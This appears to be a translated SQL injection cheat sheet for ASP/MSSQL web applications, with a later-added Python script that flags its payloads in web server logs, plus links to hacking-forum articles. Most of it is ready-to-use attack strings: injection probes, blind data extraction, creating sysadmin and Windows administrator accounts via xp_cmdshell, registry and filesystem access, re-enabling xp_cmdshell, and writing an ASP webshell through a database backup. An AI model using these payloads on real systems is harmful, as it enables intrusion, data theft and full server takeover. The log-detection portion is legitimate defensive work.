1. Test whether the parameter is injectable
; and 1=1
and 1=2
2. Preliminary check for MSSQL
and user>0
3. Identify the database system
; and (select count(*) from sysobjects)>0      -- MSSQL
; and (select count(*) from msysobjects)>0     -- Access
4. The injected parameter is a string
' and [query condition] and ''='
5. The parameter is not filtered
' and [query condition] and '%25'='
6. Guess the database
; and (select count(*) from [database name])>0
7. Guess a field
; and (select count(field name) from database name)>0
8. Guess the length of a record in the field
; and (select top 1 len(field name) from database name)>0
9. (1) Guess the ASCII value of the field (Access)
; and (select top 1 asc(mid(field name,1,1)) from database name)>0
(2) Guess the ASCII value of the field (MSSQL)
; and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test the permission structure (MSSQL)
and 1=(select is_srvrolemember('sysadmin'));
and 1=(select is_srvrolemember('serveradmin'));
and 1=(select is_srvrolemember('setupadmin'));
and 1=(select is_srvrolemember('securityadmin'));
and 1=(select is_srvrolemember('diskadmin'));
and 1=(select is_srvrolemember('bulkadmin'));
and 1=(select is_member('db_owner'));
11. Add an MSSQL login and a system account
; exec master.dbo.sp_addlogin username;
; exec master.dbo.sp_password null,username,password;
; exec master.dbo.sp_addsrvrolemember sysadmin username;
; exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';
; exec master.dbo.xp_cmdshell 'net user username password /add';
; exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';
12. (1) Traverse the directory tree
; create table dirs(paths varchar(100), id int)
; insert dirs exec master.dbo.xp_dirtree 'c:\'
; and (select top 1 paths from dirs)>0
; and (select top 1 paths from dirs where paths not in ('paths already obtained'))>0
(2) Traverse a directory
; create table temp(id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));
; insert temp exec master.dbo.xp_availablemedia;                     -- list all current drives
; insert into temp(id) exec master.dbo.xp_subdirs 'c:\';             -- list the subdirectories
; insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';        -- directory tree of all subdirectories
; insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';   -- view the contents of a file
13. MSSQL stored procedures
xp_regenumvalues  root key, subkey
; exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   -- returns all values under the key as multiple recordsets
xp_regread  root key, subkey, value name
; exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'   -- returns the named value
xp_regwrite  root key, subkey, value name, value type, value
The value type is one of two: REG_SZ for a string, REG_DWORD for an integer
; exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','REG_SZ','hello'   -- writes the value
xp_regdeletevalue  root key, subkey, value name
; exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'   -- deletes the value
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\TestKey'   -- deletes the key, including all values under it
14. Create a WebShell with an MSSQL backup
use model
create table cmd(str image);
insert into cmd(str) values('<% dim oScript %>');
backup database model to disk='c:\l.asp';
15. MSSQL built-in functions
; and (select @@version)>0        -- get the Windows version number
and user_name()='dbo'             -- test whether the current connection user is sa
and (select user_name())>0        -- connection user of the current system
and (select db_name())>0          -- currently connected database
16. Simple WebShell
use model
create table cmd(str image);
insert into cmd(str) values('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:\wwward\l.asp';
Then request it like this:
http://ip/l.asp?c=dir
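Every probe in sections 1 to 16 leaves a recognisable string in the web server's access log, which is where a defender would look for them. The following Python script is an added example, not part of the original page: it fully URL-decodes each query string (repeatedly, so the %25 double encoding of section 5 is caught) and tags each request with the technique it matches. The log field layout and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# One rule per cheat-sheet technique; regexes run over the lower-cased, decoded query.
RULES = [
    ("boolean probe",         r"\band\s+1\s*=\s*[12]\b"),
    ("mssql fingerprint",     r"\band\s+user\s*>\s*0"),
    ("schema enumeration",    r"\bm?sysobjects\b"),
    ("count/len/ascii guess", r"\b(count|len|asc|unicode)\s*\("),
    ("role probe",            r"\bis_(srvrolemember|member)\s*\("),
    ("login creation",        r"\bsp_(addlogin|password|addsrvrolemember)\b"),
    ("command execution",     r"\bxp_cmdshell\b"),
    ("filesystem walk",       r"\bxp_(dirtree|subdirs|availablemedia)\b"),
    ("registry access",       r"\bxp_reg(read|write|enumvalues|delete\w+)\b"),
    ("backup webshell",       r"\bbackup\s+database\b.*\bto\s+disk\b"),
    ("version probe",         r"@@version"),
]
COMPILED = [(name, re.compile(rx)) for name, rx in RULES]

def normalize(query):
    """URL-decode until stable (catches %25-style double encoding), then lower-case."""
    prev = None
    while prev != query:
        prev, query = query, unquote(query)
    return query.lower()

def classify(query):
    """Return the names of every technique whose pattern occurs in the query."""
    q = normalize(query)
    return [name for name, rx in COMPILED if rx.search(q)]

def scan_log(lines):
    """Return (client_ip, path, techniques) for each line that hits a rule;
    assumed field order: date time client-ip method path query status."""
    hits = []
    for parts in (line.split() for line in lines):
        found = classify(parts[5]) if len(parts) >= 7 else []
        if found:
            hits.append((parts[2], parts[4], found))
    return hits

# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    "2004-05-01 10:00:01 10.0.0.5 GET /list.asp id=222 200",
    "2004-05-01 10:00:02 10.0.0.5 GET /list.asp id=222;and%201=1 200",
    "2004-05-01 10:00:03 10.0.0.5 GET /list.asp id=222%20and%20(select%20count(*)%20from%20sysobjects)>0 500",
    "2004-05-01 10:00:04 10.0.0.5 GET /list.asp id=222;exec%20master.dbo.xp_cmdshell%20'dir' 500",
    "2004-05-01 10:00:05 10.0.0.9 GET /list.asp id=%2527%2520and%2520user%253E0 500",
]
```

A single hit on a numeric parameter is already worth an alert; the usual pattern is the 1=1 / 1=2 pair from one client followed within seconds by sysobjects or xp_ calls, and a 500 status on those requests means the error was reflected to the client.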
Reference articles:
SQL Injection Bible: ASP injection vulnerabilities in full (small bamboo)
http://fox.163n.com/xyhack/hhh/list.asp?id=222
MSSQL cross-database queries (smelly! Black night)
http://fox.163n.com/xyhack/hhh/list.asp?id=66
Dry MS SQL last drop
http://fox.163n.com/xyhack/hhh/list.asp?id=309
SQL statement reference and the Recordset object in detail
http://fox.163n.com/xyhack/hhh/list.asp?id=124
About SQL Server stored procedures
http://fox.163n.com/xyhack/hhh/list.asp?id=314
Create a WebShell with an MSSQL backup
http://fox.163n.com/xyhack/hhh/list.asp?id=219
Cross-site SQL injection (Laokai)
http://fox.163n.com/xyhack/hhh/list.asp?id=383
Weird SQL injection (AMANL)
http://fox.163n.com/xyhack/hhh/list.asp?id=320
Advanced SQL injection in SQL Server applications (translation: Qingyan Zhi Wolf)
http://fox.163n.com/xyhack/hhh/list.asp?id=338
How to traverse directories with SQL injection (SINKA QQ: 20355)
http://fox.163n.com/xyhack/hhh/list.asp?id=316
SQL injection skills (translator: Demonalex)
http://fox.163n.com/xyhack/hhh/list.asp?id=301
Some attacks on SQL databases
http://fox.163n.com/xyhack/hhh/list.asp?id=152
SQL injection attack technology (JSW)
http://fox.163n.com/xyhack/hhh/list.asp?id=208
SQL_INJECTION advanced application (APACHY)
http://fox.163n.com/xyhack/hhh/list.asp?id=221
Unconventional methods of SQL injection (Guilin veterans)
http://fox.163n.com/xyhack/hhh/list.asp?id=231
Backing up a shell
http://fox.163n.com/xyhack/hhh/list.asp?id=274
A brief talk on PHP+MySQL injection (Black Black · ≯super · HEI)
http://fox.163n.com/xyhack/hhh/list.asp?id=386
Advanced SQL injection with MySQL (Angel)
http://fox.163n.com/xyhack/hhh/list.asp?id=405
l'Injection (my)SQL via PHP
http://fox.163n.com/xyhack/hhh/list.asp?id=420
Oracle SQL language
http://fox.163n.com/xyhack/hhh/list.asp?id=206
Prerequisite tools: SQL Query Analyzer and SQLEXEC SUNX VERSION
1. To remove the xp_cmdshell extended stored procedure, use the following statement:
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2. To add the xp_cmdshell extended stored procedure, use the following statement:
(1) SQL Query Analyzer
sp_addextendedproc xp_cmdshell, @dllname='xplog70.dll'
(2) SQLEXEC Sunx Version: first enter %s in the Format option, then enter the following in the CMD option
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
To remove it again:
sp_dropextendedproc 'xp_cmdshell'
(3) MSSQL 2000
sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'